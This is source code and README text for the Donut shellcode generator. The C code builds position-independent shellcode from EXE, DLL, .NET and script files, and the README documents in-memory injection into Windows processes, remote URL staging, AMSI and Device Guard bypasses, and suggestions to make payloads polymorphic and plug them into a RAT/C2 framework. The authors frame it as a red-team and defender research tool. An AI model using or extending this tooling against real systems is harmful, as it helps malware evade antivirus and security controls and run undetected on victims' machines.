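    }

    if(c->inst_type == DONUT_INSTANCE_URL) {
        DPRINT("Validating URL");

        // no URL? exit
        if(c->url[0] == 0) {
            return DONUT_ERROR_INVALID_PARAMETER;
        }
        // doesn't begin with one of the following? exit
        if((strnicmp(c->url, "http://",  7) != 0) &&
           (strnicmp(c->url, "https://", 8) != 0)) {

            return DONUT_ERROR_INVALID_URL;
        }
        // invalid length?
        if(strlen(c->url) <= 8) {
            return DONUT_ERROR_URL_LENGTH;
        }
        // ensure URL parameter, an optional trailing slash and the module
        // name all fit in DONUT_MAX_URL *before* anything is appended to
        // c->url; previously the slash was written first and the length
        // checked afterwards.
        url_len = strlen(c->url);

        // if the end of string doesn't have a forward slash
        // add one more to account for it
        if(c->url[url_len - 1] != '/') {
            if((url_len + 1 + DONUT_MAX_MODNAME) >= DONUT_MAX_URL) {
                return DONUT_ERROR_URL_LENGTH;
            }
            strcat(c->url, "/");
            url_len++;
        }

        if((url_len + DONUT_MAX_MODNAME) >= DONUT_MAX_URL) {
            return DONUT_ERROR_URL_LENGTH;
        }
    }

    DPRINT("Validating architecture");

    if(c->arch != DONUT_ARCH_X86 &&
       c->arch != DONUT_ARCH_X64 &&
       c->arch != DONUT_ARCH_X84 &&
       c->arch != DONUT_ARCH_ANY)
    {
        return DONUT_ERROR_INVALID_ARCH;
    }

    DPRINT("Validating AMSI/WDLP bypass option");

    if(c->bypass != DONUT_BYPASS_SKIP &&
       c->bypass != DONUT_BYPASS_ABORT &&
       c->bypass != DONUT_BYPASS_CONTINUE)
    {
        return DONUT_ERROR_BYPASS_INVALID;
    }

    // get file information (maps the file; unmapped at cleanup)
    err = get_file_info(c->file, &fi);
    if(err != DONUT_ERROR_SUCCESS) return err;

    // Set the module type
    c->mod_type = fi.type;

    // Unmanaged EXE/DLL?
    if(c->mod_type == DONUT_MODULE_DLL ||
       c->mod_type == DONUT_MODULE_EXE)
    {
        DPRINT("Validating architecture %i for DLL/EXE %i",
            c->arch, fi.arch);
        // Requested shellcode is x86, but file is x64?
        // Requested shellcode is x64, but file is x86?
        if((c->arch == DONUT_ARCH_X86 &&
            fi.arch == DONUT_ARCH_X64) ||
           (c->arch == DONUT_ARCH_X64 &&
            fi.arch == DONUT_ARCH_X86))
        {
            err = DONUT_ERROR_ARCH_MISMATCH;
            goto cleanup;
        }
        // DLL function specified. Does it exist?
        if(c->mod_type == DONUT_MODULE_DLL &&
           c->method[0] != 0)
        {
            DPRINT("Validating DLL function \"%s\" for DLL", c->method);
            if(!is_dll_export(&fi, c->method)) {
                err = DONUT_ERROR_DLL_FUNCTION;
                goto cleanup;
            }
        }
    }
    // .NET DLL assembly?
    if(c->mod_type == DONUT_MODULE_NET_DLL) {
        // DLL requires class and method
        if(c->cls[0] == 0 || c->method[0] == 0) {
            err = DONUT_ERROR_NET_PARAMS;
            goto cleanup;
        }
    }

    // is this an unmanaged DLL with parameters?
    if(c->mod_type == DONUT_MODULE_DLL &&
       c->param[0] != 0)
    {
        // we need a DLL function
        if(c->method[0] == 0) {
            err = DONUT_ERROR_DLL_PARAM;
            goto cleanup;
        }
    }
    // 1. Create the module
    DPRINT("Creating module");
    err = CreateModule(c, &fi);

    if(err != DONUT_ERROR_SUCCESS)
        goto cleanup;

    // 2. Create the instance
    DPRINT("Creating instance");
    err = CreateInstance(c, &fi);

    if(err != DONUT_ERROR_SUCCESS)
        goto cleanup;

    // if DEBUG is defined, save instance to disk (best effort)
#ifdef DEBUG
    DPRINT("Saving instance to file");
    fd = fopen("instance", "wb");

    if(fd != NULL) {
        fwrite(c->inst, 1, c->inst_len, fd);
        fclose(fd);
    }
#endif
    // 3. If the module will be stored on a remote server
    if(c->inst_type == DONUT_INSTANCE_URL) {
        DPRINT("Saving %s to disk.", c->modname);
        // save the module to disk using random name
        fd = fopen(c->modname, "wb");

        // A URL payload that references a module which was never written
        // is useless, so a failed save is reported instead of ignored.
        if(fd == NULL) {
            DPRINT("Unable to create %s", c->modname);
            err = DONUT_ERROR_FILE_ACCESS;
            goto cleanup;
        }
        if(fwrite(c->mod, 1, c->mod_len, fd) != c->mod_len) {
            DPRINT("Unable to write %s", c->modname);
            fclose(fd);
            err = DONUT_ERROR_FILE_ACCESS;
            goto cleanup;
        }
        fclose(fd);
    }
    // 4. calculate size of PIC + instance combined
    if(c->arch == DONUT_ARCH_X86) {
        c->pic_len = sizeof(PAYLOAD_EXE_X86) + c->inst_len + 32;
    } else
    if(c->arch == DONUT_ARCH_X64) {
        c->pic_len = sizeof(PAYLOAD_EXE_X64) + c->inst_len + 32;
    } else
    if(c->arch == DONUT_ARCH_X84) {
        c->pic_len = sizeof(PAYLOAD_EXE_X86) +
                     sizeof(PAYLOAD_EXE_X64) + c->inst_len + 32;
    } else {
        // c->arch passed validation, but DONUT_ARCH_ANY has no PIC variant.
        // Without this guard pic_len stays 0 and the PUT_* macros below
        // would write past a zero-length allocation.
        err = DONUT_ERROR_INVALID_ARCH;
        goto cleanup;
    }
    // 5. allocate memory for shellcode
    c->pic = malloc(c->pic_len);

    DPRINT("PIC size : %" PRIi64, c->pic_len);

    if(c->pic == NULL) {
        err = DONUT_ERROR_NO_MEMORY;
        goto cleanup;
    }

    DPRINT("Inserting opcodes");
    // 6. insert shellcode
    pl = (uint8_t*)c->pic;
    // call $ + c->inst_len
    PUT_BYTE(pl,  0xE8);
    PUT_WORD(pl,  c->inst_len);
    PUT_BYTES(pl, c->inst, c->inst_len);
    // pop ecx
    PUT_BYTE(pl,  0x59);

    // x86?
    if(c->arch == DONUT_ARCH_X86) {
        // pop edx
        PUT_BYTE(pl, 0x5A);
        // push ecx
        PUT_BYTE(pl, 0x51);
        // push edx
        PUT_BYTE(pl, 0x52);

        DPRINT("Copying %" PRIi64 " bytes of x86 shellcode",
            (uint64_t)sizeof(PAYLOAD_EXE_X86));

        PUT_BYTES(pl, PAYLOAD_EXE_X86, sizeof(PAYLOAD_EXE_X86));
    } else
    // AMD64?
    if(c->arch == DONUT_ARCH_X64) {

        DPRINT("Copying %" PRIi64 " bytes of amd64 shellcode",
            (uint64_t)sizeof(PAYLOAD_EXE_X64));

        PUT_BYTES(pl, PAYLOAD_EXE_X64, sizeof(PAYLOAD_EXE_X64));
    } else
    // x86 + AMD64?
    if(c->arch == DONUT_ARCH_X84) {

        DPRINT("Copying %" PRIi64 " bytes of x86 + amd64 shellcode",
            (uint64_t)(sizeof(PAYLOAD_EXE_X86) + sizeof(PAYLOAD_EXE_X64)));

        // xor eax, eax
        PUT_BYTE(pl, 0x31);
        PUT_BYTE(pl, 0xC0);
        // dec eax
        PUT_BYTE(pl, 0x48);
        // js dword x86_code
        PUT_BYTE(pl, 0x0F);
        PUT_BYTE(pl, 0x88);
        PUT_WORD(pl,  sizeof(PAYLOAD_EXE_X64));
        PUT_BYTES(pl, PAYLOAD_EXE_X64, sizeof(PAYLOAD_EXE_X64));
        // pop edx
        PUT_BYTE(pl, 0x5A);
        // push ecx
        PUT_BYTE(pl, 0x51);
        // push edx
        PUT_BYTE(pl, 0x52);
        PUT_BYTES(pl, PAYLOAD_EXE_X86, sizeof(PAYLOAD_EXE_X86));
    }
cleanup:
    // if there was some error, release resources
    if(err != DONUT_ERROR_SUCCESS) {
        DonutDelete(c);
    }
    unmap_file(&fi);
    DPRINT("Leaving.");
    return err;
}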
1073 | ||
// Release everything DonutCreate() allocated into the configuration: the
// module, the instance and the payload. Each pointer is reset to NULL so a
// second call (including DonutCreate()'s own error path) is harmless.
// free(NULL) is a no-op, so unallocated fields need no special casing.
//
// Returns DONUT_ERROR_INVALID_PARAMETER for a NULL configuration,
// otherwise DONUT_ERROR_SUCCESS.
EXPORT_FUNC
int DonutDelete(PDONUT_CONFIG c) {

    DPRINT("Entering.");
    if(c == NULL) {
        return DONUT_ERROR_INVALID_PARAMETER;
    }

    // free module
    free(c->mod);
    c->mod = NULL;

    // free instance
    free(c->inst);
    c->inst = NULL;

    // free payload
    free(c->pic);
    c->pic = NULL;

    DPRINT("Leaving.");
    return DONUT_ERROR_SUCCESS;
}
1100 | ||
1101 | // define when building an executable | |
1102 | #ifdef DONUT_EXE | |
1103 | ||
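// Map a DONUT_ERROR_* code to a human-readable message.
//
// Returns a pointer to a static string; "N/A" for unknown codes. The
// previous implementation kept the last message in a static variable, so an
// unknown code following a known one returned the earlier message instead
// of "N/A"; returning from each case directly removes that carry-over.
const char *err2str(int err) {
    switch(err) {
    case DONUT_ERROR_SUCCESS:
        return "No error";
    case DONUT_ERROR_FILE_NOT_FOUND:
        return "File not found";
    case DONUT_ERROR_FILE_EMPTY:
        return "File is empty";
    case DONUT_ERROR_FILE_ACCESS:
        return "Cannot open file";
    case DONUT_ERROR_FILE_INVALID:
        return "File is invalid";
    case DONUT_ERROR_NET_PARAMS:
        return "File is a .NET DLL. Donut requires a class and method";
    case DONUT_ERROR_NO_MEMORY:
        return "No memory available";
    case DONUT_ERROR_INVALID_ARCH:
        return "Invalid architecture specified";
    case DONUT_ERROR_INVALID_URL:
        return "Invalid URL";
    case DONUT_ERROR_URL_LENGTH:
        return "Invalid URL length";
    case DONUT_ERROR_INVALID_PARAMETER:
        return "Invalid parameter";
    case DONUT_ERROR_RANDOM:
        return "Error generating random values";
    case DONUT_ERROR_DLL_FUNCTION:
        return "Unable to locate DLL function provided. Names are case sensitive";
    case DONUT_ERROR_ARCH_MISMATCH:
        return "Target architecture cannot support selected DLL/EXE file";
    case DONUT_ERROR_DLL_PARAM:
        return "You've supplied parameters for an unmanaged DLL. Donut also requires a DLL function";
    case DONUT_ERROR_BYPASS_INVALID:
        return "Invalid bypass option specified";
    default:
        return "N/A";
    }
}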
1159 | ||
// Fetch the value of option argv[*i]: either the rest of the same argument
// ("-fpath") or the following argument ("-f path"), in which case *i is
// advanced past it. argv[*i] is expected to be an option of the form
// "-x...". Prints a message and exits (status 0) when no value is present.
static char* get_param (int argc, char *argv[], int *i) {
    int   n   = *i;
    char *opt = argv[n];

    // value glued to the option letter?
    if (opt[2] != 0) {
        return opt + 2;
    }

    // value in the next argument?
    if (n + 1 < argc) {
        *i = n + 1;
        return argv[*i];
    }

    printf(" [ %c%c requires parameter\n", opt[0], opt[1]);
    exit (0);
}
1172 | ||
1173 | static void usage (void) { | |
1174 | printf(" usage: donut [options] -f <EXE/DLL/VBS/JS/XSL>\n\n"); | |
1175 | ||
1176 | printf(" -MODULE OPTIONS-\n\n"); | |
1177 | printf(" -f <path> .NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory.\n"); | |
1178 | printf(" -u <URL> HTTP server that will host the donut module.\n\n"); | |
1179 | ||
1180 | printf(" -PIC/SHELLCODE OPTIONS-\n\n"); | |
1181 | printf(" -a <arch> Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default).\n"); | |
1182 | printf(" -b <level> Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default)\n"); | |
1183 | printf(" -o <payload> Output file. Default is \"payload.bin\"\n\n"); | |
1184 | ||
1185 | printf(" -DOTNET OPTIONS-\n\n"); | |
1186 | printf(" -c <namespace.class> Optional class name. (required for .NET DLL)\n"); | |
1187 | printf(" -m <method | api> Optional method or API name for DLL. (method is required for .NET DLL)\n"); | |
1188 | printf(" -p <arg1,arg2...> Optional parameters or command line, separated by comma or semi-colon.\n"); | |
1189 | printf(" -r <version> CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.\n"); | |
1190 | printf(" -d <name> AppDomain name to create for .NET. Randomly generated by default.\n\n"); | |
1191 | ||
1192 | printf(" examples:\n\n"); | |
1193 | printf(" donut -f c2.dll\n"); | |
1194 | printf(" donut -a1 -cTestClass -mRunProcess -pnotepad.exe -floader.dll\n"); | |
1195 | printf(" donut -f loader.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe -u http://remote_server.com/modules/\n"); | |
1196 | ||
1197 | exit (0); | |
1198 | } | |
1199 | ||
1200 | int main(int argc, char *argv[]) { | |
1201 | DONUT_CONFIG c; | |
1202 | char opt; | |
1203 | int i, err; | |
1204 | FILE *fd; | |
1205 | char *mod_type, *payload="payload.bin", | |
1206 | *arch_str[3] = { "x86", "AMD64", "x86+AMD64" }; | |
1207 | char *inst_type[2]= { "PIC", "URL" }; | |
1208 | ||
1209 | printf("\n"); | |
1210 | printf(" [ Donut shellcode generator v0.9.2\n"); | |
1211 | printf(" [ Copyright (c) 2019 TheWover, Odzhan\n\n"); | |
1212 | ||
1213 | // zero initialize configuration | |
1214 | memset(&c, 0, sizeof(c)); | |
1215 | ||
1216 | // default type is position independent code for dual-mode (x86 + amd64) | |
1217 | c.inst_type = DONUT_INSTANCE_PIC; | |
1218 | c.arch = DONUT_ARCH_X84; | |
1219 | c.bypass = DONUT_BYPASS_CONTINUE; // continues loading even if disabling AMSI/WLDP fails | |
1220 | ||
1221 | // parse arguments | |
1222 | for(i=1; i<argc; i++) { | |
1223 | // switch? | |
1224 | if(argv[i][0] != '-' && argv[i][0] != '/') { | |
1225 | usage(); | |
1226 | } | |
1227 | opt = argv[i][1]; | |
1228 | ||
1229 | switch(opt) { | |
1230 | // target cpu architecture | |
1231 | case 'a': | |
1232 | c.arch = atoi(get_param(argc, argv, &i)); | |
1233 | break; | |
1234 | // bypass options | |
1235 | case 'b': | |
1236 | c.bypass = atoi(get_param(argc, argv, &i)); | |
1237 | break; | |
1238 | // name of domain to use for .NET assembly | |
1239 | case 'd': | |
1240 | strncpy(c.domain, get_param(argc, argv, &i), DONUT_MAX_NAME - 1); | |
1241 | break; | |
1242 | // EXE/DLL/VBS/JS/XSL file to embed in shellcode | |
1243 | case 'f': | |
1244 | strncpy(c.file, get_param(argc, argv, &i), DONUT_MAX_NAME - 1); | |
1245 | break; | |
1246 | // runtime version to use for .NET DLL / EXE | |
1247 | case 'r': | |
1248 | strncpy(c.runtime, get_param(argc, argv, &i), DONUT_MAX_NAME - 1); | |
1249 | break; | |
1250 | // URL of remote module | |
1251 | case 'u': { | |
1252 | strncpy(c.url, get_param(argc, argv, &i), DONUT_MAX_URL - 2); | |
1253 | c.inst_type = DONUT_INSTANCE_URL; | |
1254 | break; | |
1255 | } | |
1256 | // class of .NET assembly | |
1257 | case 'c': | |
1258 | strncpy(c.cls, get_param(argc, argv, &i), DONUT_MAX_NAME - 1); | |
1259 | break; | |
1260 | // method of .NET assembly | |
1261 | case 'm': | |
1262 | strncpy(c.method, get_param(argc, argv, &i), DONUT_MAX_NAME - 1); | |
1263 | break; | |
1264 | // output file for payload | |
1265 | case 'o': | |
1266 | payload = get_param(argc, argv, &i); | |
1267 | break; | |
1268 | // parameters to method or DLL function | |
1269 | case 'p': | |
1270 | strncpy(c.param, get_param(argc, argv, &i), sizeof(c.param) - 1); | |
1271 | break; | |
1272 | default: | |
1273 | usage(); | |
1274 | break; | |
1275 | } | |
1276 | } | |
1277 | ||
1278 | // no file? show usage and exit | |
1279 | if(c.file[0] == 0) { | |
1280 | usage(); | |
1281 | } | |
1282 | ||
1283 | // generate payload from configuration | |
1284 | err = DonutCreate(&c); | |
1285 | ||
1286 | if(err != DONUT_ERROR_SUCCESS) { | |
1287 | printf(" [ Error : %s\n", err2str(err)); | |
1288 | return 0; | |
1289 | } | |
1290 | ||
1291 | switch(c.mod_type) { | |
1292 | case DONUT_MODULE_DLL: | |
1293 | mod_type = "DLL"; | |
1294 | break; | |
1295 | case DONUT_MODULE_EXE: | |
1296 | mod_type = "EXE"; | |
1297 | break; | |
1298 | case DONUT_MODULE_NET_DLL: | |
1299 | mod_type = ".NET DLL"; | |
1300 | break; | |
1301 | case DONUT_MODULE_NET_EXE: | |
1302 | mod_type = ".NET EXE"; | |
1303 | break; | |
1304 | case DONUT_MODULE_VBS: | |
1305 | mod_type = "VBScript"; | |
1306 | break; | |
1307 | case DONUT_MODULE_JS: | |
1308 | mod_type = "JScript"; | |
1309 | break; | |
1310 | case DONUT_MODULE_XSL: | |
1311 | mod_type = "XSL"; | |
1312 | break; | |
1313 | default: | |
1314 | mod_type = "Unrecognized"; | |
1315 | break; | |
1316 | } | |
1317 | printf(" [ Instance type : %s\n", inst_type[c.inst_type - 1]); | |
1318 | printf(" [ Module file : \"%s\"\n", c.file ); | |
1319 | printf(" [ File type : %s\n", mod_type); | |
1320 | ||
1321 | // if this is a .NET DLL, display the class and method | |
1322 | if(c.mod_type == DONUT_MODULE_NET_DLL) { | |
1323 | printf(" [ Class : %s\n", c.cls ); | |
1324 | printf(" [ Method : %s\n", c.method); | |
1325 | } else | |
1326 | if(c.mod_type == DONUT_MODULE_DLL) { | |
1327 | printf(" [ Function : %s\n", | |
1328 | c.method[0] != 0 ? c.method : "DllMain"); | |
1329 | } | |
1330 | // if parameters supplied, display them | |
1331 | if(c.param[0] != 0) { | |
1332 | printf(" [ Parameters : %s\n", c.param); | |
1333 | } | |
1334 | printf(" [ Target CPU : %s\n", arch_str[c.arch - 1]); | |
1335 | ||
1336 | if(c.inst_type == DONUT_INSTANCE_URL) { | |
1337 | printf(" [ Module name : %s\n", c.modname); | |
1338 | printf(" [ Upload to : %s\n", c.url); | |
1339 | } | |
1340 | ||
1341 | printf(" [ AMSI/WDLP : %s\n", | |
1342 | c.bypass == DONUT_BYPASS_SKIP ? "skip" : | |
1343 | c.bypass == DONUT_BYPASS_ABORT ? "abort" : "continue"); | |
1344 | ||
1345 | printf(" [ Shellcode : \"%s\"\n\n", payload); | |
1346 | fd = fopen(payload, "wb"); | |
1347 | ||
1348 | if(fd != NULL) { | |
1349 | fwrite(c.pic, sizeof(char), c.pic_len, fd); | |
1350 | fclose(fd); | |
1351 | } else { | |
1352 | printf(" [ Error opening \"%s\" for payload.\n", payload); | |
1353 | } | |
1354 | // release resources | |
1355 | DonutDelete(&c); | |
1356 | return 0; | |
1357 | } | |
1358 | #endif |
0 | Metadata-Version: 2.1 | |
1 | Name: donut-shellcode | |
2 | Version: 0.9.2 | |
3 | Summary: Donut Python C extension | |
4 | Home-page: https://github.com/TheWover/donut | |
5 | Author: TheWover, Odzhan, byt3bl33d3r | |
6 | License: UNKNOWN | |
7 | Description: # Using Donut | |
8 | ||
9 | ![Alt text](https://github.com/TheWover/donut/blob/master/img/donut.PNG?raw=true "An ASCII donut") | |
10 | ||
11 | Version: 0.9.2 *please submit issues and requests for v1.0 release* | |
12 | ||
13 | Odzhan's blog post (about the generator): https://modexp.wordpress.com/2019/05/10/dotnet-loader-shellcode/ | |
14 | ||
15 | TheWover's blog post (detailed walkthrough, and about how donut affects tradecraft): https://thewover.github.io/Introducing-Donut/ | |
16 | ||
17 | v0.9.2 release blog post: https://thewover.github.io/Bear-Claw/ | |
18 | ||
19 | ## Introduction | |
20 | ||
21 | Donut generates x86 or x64 shellcode from VBScript, JScript, EXE, DLL (including .NET Assemblies) and XSL files. This shellcode can be injected into an arbitrary Windows processes for in-memory execution. Given a supported file type, parameters and an entry point where applicable (such as Program.Main), it produces position-independent shellcode that loads and runs entirely from memory. A module created by donut can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the module is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the file is loaded through the PE/ActiveScript/CLR loader, the original reference is erased from memory to deter memory scanners. For .NET Assemblies, they are loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains. | |
22 | ||
23 | It can be used in several ways. | |
24 | ||
25 | ## As a Standalone Tool | |
26 | ||
27 | Donut can be used as-is to generate shellcode from VBS/JS/EXE/DLL/XSL files or .NET Assemblies. A Linux and Windows executable and a Python module are provided for payload generation. The Python documentation can be found [here](https://github.com/TheWover/donut/blob/master/docs/2019-08-21-Python_Extension.md). The command-line syntax is as described below. | |
28 | ||
29 | ``` | |
30 | ||
31 | usage: donut [options] -f <EXE/DLL/VBS/JS/XSL> | |
32 | ||
33 | -MODULE OPTIONS- | |
34 | ||
35 | -f <path> .NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory. | |
36 | -u <URL> HTTP server that will host the donut module. | |
37 | ||
38 | -PIC/SHELLCODE OPTIONS- | |
39 | ||
40 | -a <arch> Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default). | |
41 | -b <level> Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default) | |
42 | -o <payload> Output file. Default is "payload.bin" | |
43 | ||
44 | -DOTNET OPTIONS- | |
45 | ||
46 | -c <namespace.class> Optional class name. (required for .NET DLL) | |
47 | -m <method | api> Optional method or API name for DLL. (method is required for .NET DLL) | |
48 | -p <arg1,arg2...> Optional parameters or command line, separated by comma or semi-colon. | |
49 | -r <version> CLR runtime version. MetaHeader used by default or v4.0.30319 if none available. | |
50 | -d <name> AppDomain name to create for .NET. Randomly generated by default. | |
51 | ||
52 | examples: | |
53 | ||
54 | donut -f c2.dll | |
55 | donut -a1 -cTestClass -mRunProcess -pnotepad.exe -floader.dll | |
56 | donut -f loader.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe -u http://remote_server.com/modules/ | |
57 | ||
58 | ``` | |
59 | ||
60 | ### Building Donut | |
61 | ||
62 | Tags have been provided for each release version of donut that contain the compiled executables. | |
63 | ||
64 | * v0.9.2, Bear Claw: | |
65 | * v0.9.2 Beta: https://github.com/TheWover/donut/releases/tag/v0.9.2 | |
66 | * v0.9.1, Apple Fritter: https://github.com/TheWover/donut/releases/tag/v0.9.1 | |
67 | * v0.9, Initial Release: https://github.com/TheWover/donut/releases/tag/v0.9 | |
68 | ||
69 | However, you may also clone and build the source yourself using the provided makefiles. | |
70 | ||
71 | ## Building From Repository | |
72 | ||
73 | From a Windows command prompt or Linux terminal, clone the repository and change to the donut directory. | |
74 | ||
75 | ``` | |
76 | git clone http://github.com/thewover/donut | |
77 | cd donut | |
78 | ``` | |
79 | ||
80 | ## Linux | |
81 | ||
82 | Simply run make to generate an executable, static and dynamic libraries. | |
83 | ||
84 | ``` | |
85 | make | |
86 | make clean | |
87 | make debug | |
88 | ``` | |
89 | ||
90 | ## Windows | |
91 | ||
92 | Start a Microsoft Visual Studio Developer Command Prompt and `` cd `` to donut's directory. The Microsft (non-gcc) Makefile can be specified with ``` -f Makefile.msvc ```. The makefile provides the following commmands to build donut: | |
93 | ||
94 | ``` | |
95 | nmake -f Makefile.msvc | |
96 | nmake clean -f Makefile.msvc | |
97 | nmake debug -f Makefile.msvc | |
98 | ``` | |
99 | ||
100 | ## As a Library | |
101 | ||
102 | donut can be compiled as both dynamic and static libraries for both Linux (*.a* / *.so*) and Windows(*.lib* / *.dll*). It has a simple API that is described in *docs/api.html*. Two exported functions are provided: ``` int DonutCreate(PDONUT_CONFIG c) ``` and ``` int DonutDelete(PDONUT_CONFIG c) ``` . | |
103 | ||
104 | ## As a Python Module | |
105 | ||
106 | Donut can be installed and used as a Python module. To install Donut from your current directory, use pip for Python3. | |
107 | ||
108 | ``` | |
109 | pip install . | |
110 | ``` | |
111 | ||
112 | Otherwise, you may install Donut as a Python module by grabbing it from the PyPi repostiory. | |
113 | ||
114 | ``` | |
115 | pip install donut-shellcode | |
116 | ``` | |
117 | ||
118 | ## As a Template - Rebuilding the shellcode | |
119 | ||
120 | *payload/* contains the in-memory loaders for PE/DLL/VBS/JS/XSL and .NET assemblies, which should successfully compile with both Microsoft Visual Studio and Mingw-w64. Make files have been provided for both compilers which will generate x86-64 shellcode by default unless x86 is supplied as a label to nmake/make. Whenever files in the payload directory have been changed, recompiling for all architectures is recommended before rebuilding donut. | |
121 | ||
122 | ### Microsoft Visual Studio | |
123 | ||
124 | **Due to recent changes in the MSVC compiler, we now only support MSVC versions 2019 and later.** | |
125 | ||
126 | Open the x64 Microsoft Visual Studio build environment, switch to the *payload* directory, and type the following: | |
127 | ||
128 | ``` | |
129 | nmake clean -f Makefile.msvc | |
130 | nmake -f Makefile.msvc | |
131 | ``` | |
132 | ||
133 | This should generate a 64-bit executable (*payload.exe*) from *payload.c*. exe2h will then extract the shellcode from the *.text* segment of the PE file and save it as a C array to *payload_exe_x64.h*. When donut is rebuilt, this new shellcode will be used for all payloads that it generates. | |
134 | ||
135 | To generate 32-bit shellcode, open the x86 Microsoft Visual Studio build environment, switch to the payload directory, and type the following: | |
136 | ||
137 | ``` | |
138 | nmake clean -f Makefile.msvc | |
139 | nmake x86 -f Makefile.msvc | |
140 | ``` | |
141 | ||
142 | This will save the shellcode as a C array to *payload_exe_x86.h*. | |
143 | ||
144 | ### Mingw-w64 | |
145 | ||
146 | Assuming you're on Linux and *mingw-w64* has been installed from packages or source, you may still rebuild the shellcode using our provided makefile. Change to the *payload* directory and type the following: | |
147 | ||
148 | ``` | |
149 | make clean -f Makefile.mingw | |
150 | make -f Makefile.mingw | |
151 | ``` | |
152 | ||
153 | Once you've recompiled for all architectures, you may rebuild donut. | |
154 | ||
155 | ## Bypasses | |
156 | ||
157 | Donut includes a bypass system for AMSI and other security features. Currently we bypass: | |
158 | ||
159 | * AMSI in .NET v4.8 | |
160 | * Device Guard policy preventing dynamicly generated code from executing | |
161 | ||
162 | You may customize our bypasses or add your own. The bypass logic is defined in payload/bypass.c. | |
163 | ||
164 | Each bypass implements the DisableAMSI fuction with the signature ```BOOL DisableAMSI(PDONUT_INSTANCE inst)```, and comes with a corresponding preprocessor directive. We have several ```#if defined``` blocks that check for definitions. Each block implements the same bypass function. For instance, our first bypass is called ```BYPASS_AMSI_A```. If donut is built with that variable defined, then that bypass will be used. | |
165 | ||
166 | Why do it this way? Because it means that only the bypass you are using is built into payload.exe. As a result, the others are not included in your shellcode. This reduces the size and complexity of your shellcode, adds modularity to the design, and ensures that scanners cannot find suspicious blocks in your shellcode that you are not actually using. | |
167 | ||
168 | Another benefit of this design is that you may write your own AMSI bypass. To build Donut with your new bypass, use an ```if defined``` block for your bypass and modify the makefile to add an option that builds with the name of your bypass defined. | |
169 | ||
170 | If you wanted to, you could extend our bypass system to add in other pre-execution logic that runs before your .NET Assembly is loaded. | |
171 | ||
172 | Odzhan wrote a [blog post](https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/) on the details of our AMSI bypass research. | |
173 | ||
174 | ### Additional features. | |
175 | ||
176 | These are left as exercises to the reader. I would personally recommend: | |
177 | ||
178 | * Add environmental keying | |
179 | * Make donut polymorphic by obfuscating *payload* every time shellcode is generated | |
180 | * Integrate donut as a module into your favorite RAT/C2 Framework | |
181 | ||
182 | ## Disclaimers | |
183 | ||
184 | * No, we will not update donut to counter signatures or detections by any AV. | |
185 | * We are not responsible for any misuse of this software or technique. Donut is provided as a demonstration of CLR Injection through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully that is correct. | |
186 | ||
187 | # How it works | |
188 | ||
189 | ## Procedure for Assemblies | |
190 | ||
191 | Donut uses the Unmanaged CLR Hosting API to load the Common Language Runtime. If necessary, the Assembly is downloaded into memory. Either way, it is decrypted using the Chaskey block cipher. Once the CLR is loaded into the host process, a new AppDomain will be created using a random name unless otherwise specified. Once the AppDomain is ready, the .NET Assembly is loaded through AppDomain.Load_3. Finally, the Entry Point specified by the user is invoked with any specified parameters. | |
192 | ||
193 | The logic above describes how the shellcode generated by donut works. That logic is defined in *payload.exe*. To get the shellcode, *exe2h* extracts the compiled machine code from the *.text* segment in *payload.exe* and saves it as a C array to a C header file. *donut* combines the shellcode with a Donut Instance (a configuration for the shellcode) and a Donut Module (a structure containing the .NET assembly, class name, method name and any parameters). | |
194 | ||
195 | Refer to MSDN for documentation on the Undocumented CLR Hosting API: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/clr-hosting-interfaces | |
196 | ||
197 | For a standalone example of a CLR Host, refer to Casey Smith's AssemblyLoader repo: https://github.com/caseysmithrc/AssemblyLoader | |
198 | ||
199 | Detailed blog posts about how donut works are available at both Odzhan's and TheWover's blogs. Links are at the top of the README. | |
200 | ||
201 | ## Procedure for ActiveScript/XSL | |
202 | ||
203 | The details of how Donut loads scripts and XSL files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/07/21/inmem-exec-script/). | |
204 | ||
205 | ## Procedure for PE Loading | |
206 | ||
207 | The details of how Donut loads PE files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/06/24/inmem-exec-dll/). | |
208 | ||
209 | ## Components | |
210 | ||
211 | Donut contains the following elements: | |
212 | ||
213 | * donut.c: The source code for the donut payload generator | |
214 | * donut.exe: The compiled payload generator as an EXE | |
215 | * donut.py: The donut payload generator as a Python script *(planned for version 1.0)* | |
216 | * donutmodule.c: The CPython wrapper for Donut. Used by the Python module. | |
217 | * setup.py: The setup file for installing Donut as a Pip Python3 module. | |
218 | * lib/donut.dll, lib/donut.lib: Donut as a dynamic and static library for use in other projects on Windows platform | |
219 | * lib/donut.so, lib/donut.a: Donut as a dynamic and static library for use in other projects on the Linux platform | |
220 | * lib/donut.h: Header file to include if using the static or dynamic libraries in a C/C++ project | |
221 | * payload/payload.c: Main file for the shellcode. | |
222 | * payload/inmem_dotnet.c: In-Memory loader for .NET EXE/DLL assemblies. | |
223 | * payload/inmem_pe.c: In-Memory loader for EXE/DLL files. | |
224 | * payload/inmem_xml.c: In-Memory loader for XSL/XML files. | |
225 | * payload/inmem_script.c: In-Memory loader for VBScript/JScript files. | |
226 | * payload/activescript.c: ActiveScriptSite interface required for in-memory execution of VBS/JS files. | |
227 | * payload/wscript.c: Supports a number of WScript methods that cscript/wscript support. | |
228 | * payload/bypass.c: Functions to bypass Anti-malware Scan Interface (AMSI) and Windows Local Device Policy (WLDP) | |
229 | * payload/http_client.c: Downloads a module from remote staging server into memory. | |
230 | * payload/peb.c: Used to resolve the address of DLL functions via Process Environment Block (PEB). | |
